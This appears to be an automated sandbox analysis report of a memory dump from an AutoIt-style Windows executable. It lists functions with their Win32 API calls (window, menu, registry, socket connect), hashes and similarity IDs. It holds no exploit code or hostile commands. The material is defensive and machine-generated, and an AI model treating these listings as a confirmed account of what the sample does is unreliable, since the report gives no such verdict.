                                                                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 003F655B
                                                                                                                                                                      • GetWindowLongW.USER32(011993A0,000000F0), ref: 003F658E
                                                                                                                                                                      • GetWindowLongW.USER32(011993A0,000000F0), ref: 003F65C3
                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 003F65F5
                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 003F661F
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 003F6630
                                                                                                                                                                      • SetWindowLongW.USER32 ref: 003F664A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2178440468-0
                                                                                                                                                                      • Opcode ID: f118ec8de7cefae303e5e3f99b78760338a6f5d4a4635408646072a7c01d2805
                                                                                                                                                                      • Instruction ID: 1266fc440097eede953e218e33630bdb347dda02bb2c168a5821b90655a65bcd
                                                                                                                                                                      • Opcode Fuzzy Hash: f118ec8de7cefae303e5e3f99b78760338a6f5d4a4635408646072a7c01d2805
                                                                                                                                                                      • Instruction Fuzzy Hash: 01311531604119AFDB22DF18DC86F6537E5FB4A310F1A4168FA05DB2B6CB71AC40DB55
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E6486, Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003E80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003E80CB
                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003E64D9
                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 003E64E8
                                                                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003E6521
                                                                                                                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 003E652A
                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 003E6534
                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 003E655D
                                                                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003E6576
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 910771015-0
                                                                                                                                                                      • Opcode ID: 03ab031383ded729838a25179d0a58ea38a84a923f451a9d3d24ef9098f878b8
                                                                                                                                                                      • Instruction ID: 1919fba7e090b2002fe63da92e078ff741d849dce693600596df85aaf00370eb
                                                                                                                                                                      • Opcode Fuzzy Hash: 03ab031383ded729838a25179d0a58ea38a84a923f451a9d3d24ef9098f878b8
                                                                                                                                                                      • Instruction Fuzzy Hash: 8731A471600228AFDB12AF15CC86BBE77ACEF557A0F018169FD099B2D1CB74AD04CB61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CE0B5, Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003CE0FA
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003CE120
                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 003CE123
                                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 003CE144
                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 003CE14D
                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 003CE167
                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 003CE175
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                      • Opcode ID: b46b7e413d0407680fba5345d0edfea64086cf45665eebfe15522a2b7abad2c4
                                                                                                                                                                      • Instruction ID: deb952b84bcd267f9a7f808552648a18ef682c9962ce6ac0a9089c36d8a6ec0f
                                                                                                                                                                      • Opcode Fuzzy Hash: b46b7e413d0407680fba5345d0edfea64086cf45665eebfe15522a2b7abad2c4
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D214136604118AF9B11AFA9DC88DBB77ECEF09760B158129FD15CB260DA70DC41DB64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CFB6E, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                                                                      • Opcode ID: 68e3a674c30d97f2b419807879d91f1144fe8a907f542f8a42f47e9db341a26b
                                                                                                                                                                      • Instruction ID: b2657dd30c4284bc87d6e855ae37806030bf04e321b8142f0dd00ca51a98de11
                                                                                                                                                                      • Opcode Fuzzy Hash: 68e3a674c30d97f2b419807879d91f1144fe8a907f542f8a42f47e9db341a26b
                                                                                                                                                                      • Instruction Fuzzy Hash: C3216772200211AED633B620DD12FA773EDEF11340F24C43AF885DA181EB62AE81D3A5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F783C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00371D35: CreateWindowExW.USER32 ref: 00371D73
                                                                                                                                                                        • Part of subcall function 00371D35: GetStockObject.GDI32(00000011), ref: 00371D87
                                                                                                                                                                        • Part of subcall function 00371D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00371D91
                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003F78A1
                                                                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003F78AE
                                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003F78B9
                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003F78C8
                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003F78D4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                                                                      • Opcode ID: 179ca289717aea78760fd295c40582a078c3462c61b57ad3d1c8ac9b86ffb463
                                                                                                                                                                      • Instruction ID: bd78b431325961ead12a35329910188ddc799a795ab814af619630c815183e8b
                                                                                                                                                                      • Opcode Fuzzy Hash: 179ca289717aea78760fd295c40582a078c3462c61b57ad3d1c8ac9b86ffb463
                                                                                                                                                                      • Instruction Fuzzy Hash: 19118EB211021DBEEF169E60CC86EE77F6DEF08798F014125FB04A6090CB729C21DBA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003941C9, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00394292,?), ref: 003941E3
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 003941EA
                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 003941F6
                                                                                                                                                                      • DecodePointer.KERNEL32(00000001,00394292,?), ref: 00394213
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                      • String ID: RoInitialize$combase.dll
                                                                                                                                                                      • API String ID: 3489934621-340411864
                                                                                                                                                                      • Opcode ID: c7cb67211460d1227ed05112125900c48cd9612c740fcbf5a705846b41701ed6
                                                                                                                                                                      • Instruction ID: 08cb6e77900bcc5d4879b68e816f966195f7b0e14cbf12480137227699052a2d
                                                                                                                                                                      • Opcode Fuzzy Hash: c7cb67211460d1227ed05112125900c48cd9612c740fcbf5a705846b41701ed6
                                                                                                                                                                      • Instruction Fuzzy Hash: C2E01AB4690740AEEF226BB0EC4DFA43AA8BFA2702F115835B811E50F0DBF55491CF08
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0039429E, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003941B8), ref: 003942B8
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 003942BF
                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 003942CA
                                                                                                                                                                      • DecodePointer.KERNEL32(003941B8), ref: 003942E5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                                                                                      • API String ID: 3489934621-2819208100
                                                                                                                                                                      • Opcode ID: b41e18416e1b9be57b9d200a72c2df60ed494fbe0bcd339d0675e9f31cf81ad4
                                                                                                                                                                      • Instruction ID: 469a618bed460eac3d46886cbb2107f0bc98c3949b660d9095e12c927db9b885
                                                                                                                                                                      • Opcode Fuzzy Hash: b41e18416e1b9be57b9d200a72c2df60ed494fbe0bcd339d0675e9f31cf81ad4
                                                                                                                                                                      • Instruction Fuzzy Hash: 3BE0B67C591701AFEF529B60ED0DF953AA8BF64742F215436F401E11E0CFB45A80EB18
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D675A, Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memmove$__itow__swprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3253778849-0
                                                                                                                                                                      • Opcode ID: 050cad00ceadbf0a7f17427ca5687af5280c75e125037f1e1a160f767cf2500a
                                                                                                                                                                      • Instruction ID: 0d8376f171342cd3b6e8fcaf6f75ec98da699dc6d2b7973eca168bd144684ce3
                                                                                                                                                                      • Opcode Fuzzy Hash: 050cad00ceadbf0a7f17427ca5687af5280c75e125037f1e1a160f767cf2500a
                                                                                                                                                                      • Instruction Fuzzy Hash: AE61BE3150065A9BDF23EF60DC82FFE37A9AF45308F04855AF9696F292DB35A901CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F046F, Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                        • Part of subcall function 003F10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003F0038,?,?), ref: 003F10BC
                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003F0548
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003F0588
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003F05AB
                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003F05D4
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003F0617
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 003F0624
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4046560759-0
                                                                                                                                                                      • Opcode ID: a9df7da14df388ca10c611d06a9a57ef427eafb965160aca2f4ea99656127cf7
                                                                                                                                                                      • Instruction ID: 44ad0c7ff623ed327a8e0cd6088fe971f858ce188bf0137b669315660647c16d
                                                                                                                                                                      • Opcode Fuzzy Hash: a9df7da14df388ca10c611d06a9a57ef427eafb965160aca2f4ea99656127cf7
                                                                                                                                                                      • Instruction Fuzzy Hash: CB516C31108244AFCB16EB58C885E7FBBE8FF85314F04891DF5599B2A2DB75E904CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F5A20, Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 650687236-0
                                                                                                                                                                      • Opcode ID: e1ecf4959d2be3fcaeca07b5e7660feac7c1a394a3dd85ec3af46aff99c4deb4
                                                                                                                                                                      • Instruction ID: 8d26fa51b7a09f2028eb9200cef56dce572b7cef475b2120c953c82c940e4ce0
                                                                                                                                                                      • Opcode Fuzzy Hash: e1ecf4959d2be3fcaeca07b5e7660feac7c1a394a3dd85ec3af46aff99c4deb4
                                                                                                                                                                      • Instruction Fuzzy Hash: D7518F35A00619EFDF16EF64C845ABEB7B4EF48320F11446AEA15BB351CB74AE41CB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CF3DD, Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003CF3F7
                                                                                                                                                                      • VariantClear.OLEAUT32(00000013), ref: 003CF469
                                                                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 003CF4C4
                                                                                                                                                                      • _memmove.LIBCMT ref: 003CF4EE
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003CF53B
                                                                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003CF569
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1101466143-0
                                                                                                                                                                      • Opcode ID: 37259d4613cf199687992dfd2011da2667a26ceffcbe2eced3a84e1442ebdcdf
                                                                                                                                                                      • Instruction ID: db7acb1022e2114ae040a8552cce4e59859844586d0b1ee737474a56277d8dc2
                                                                                                                                                                      • Opcode Fuzzy Hash: 37259d4613cf199687992dfd2011da2667a26ceffcbe2eced3a84e1442ebdcdf
                                                                                                                                                                      • Instruction Fuzzy Hash: FA5146B5A00209AFCB15CF58D884EAAB7B9FF4C354F15856AEE59DB310D730E911CBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D26F9, Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003D2747
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003D2792
                                                                                                                                                                      • IsMenu.USER32 ref: 003D27B2
                                                                                                                                                                      • CreatePopupMenu.USER32(00436890,00000000,774233D0), ref: 003D27E6
                                                                                                                                                                      • GetMenuItemCount.USER32 ref: 003D2844
                                                                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003D2875
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3311875123-0
                                                                                                                                                                      • Opcode ID: 739ad4fb793b7581eb89c935848dbb8f6363401f5871b336be38ce67cc297e3d
                                                                                                                                                                      • Instruction ID: 7591e008157ef50364c663480e1d5b13f6f2750469d686dfd148cbf4ffc5c2e5
                                                                                                                                                                      • Opcode Fuzzy Hash: 739ad4fb793b7581eb89c935848dbb8f6363401f5871b336be38ce67cc297e3d
                                                                                                                                                                      • Instruction Fuzzy Hash: 0451D371A00309DFDF26CF68E888BAFBBF8AF65314F11426AE8159B391D7709904DB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00371765, Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00372612: GetWindowLongW.USER32(?,000000EB), ref: 00372623
                                                                                                                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 0037179A
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003717FE
                                                                                                                                                                      • ScreenToClient.USER32 ref: 0037181B
                                                                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0037182C
                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 00371876
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1827037458-0
                                                                                                                                                                      • Opcode ID: 2e03ce22a1359072af504939a72534e53eb5192091419acc1af7abfef1ede1d4
                                                                                                                                                                      • Instruction ID: c9463e6ac0a654e2d13826aca95226ff49840fae93886b42361d51ee132578e9
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e03ce22a1359072af504939a72534e53eb5192091419acc1af7abfef1ede1d4
                                                                                                                                                                      • Instruction Fuzzy Hash: B1419271104301AFD722DF29CC84F767BF8EB4A724F148629F9988B2A2C7359845DB62
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FB958, Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShowWindow.USER32(004367B0,00000000,011993A0,?,?,004367B0,?,003FB862,?,?), ref: 003FB9CC
                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 003FB9F0
                                                                                                                                                                      • ShowWindow.USER32(004367B0,00000000,011993A0,?,?,004367B0,?,003FB862,?,?), ref: 003FBA50
                                                                                                                                                                      • ShowWindow.USER32(?,00000004,?,003FB862,?,?), ref: 003FBA62
                                                                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 003FBA86
                                                                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 003FBAA9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 642888154-0
                                                                                                                                                                      • Opcode ID: 97030b412cbe69f45286571c6b4668fde0fd52a05654516d90af079accd732f6
                                                                                                                                                                      • Instruction ID: 05bf2f9fe080000148ec82539cd8cebca81fd35ee3ab050a794e4ec82a7e6c31
                                                                                                                                                                      • Opcode Fuzzy Hash: 97030b412cbe69f45286571c6b4668fde0fd52a05654516d90af079accd732f6
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D415074600249AFDB23DF14C989BB5BBE4BF05310F1942B9EB588F6A2C771E845CB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

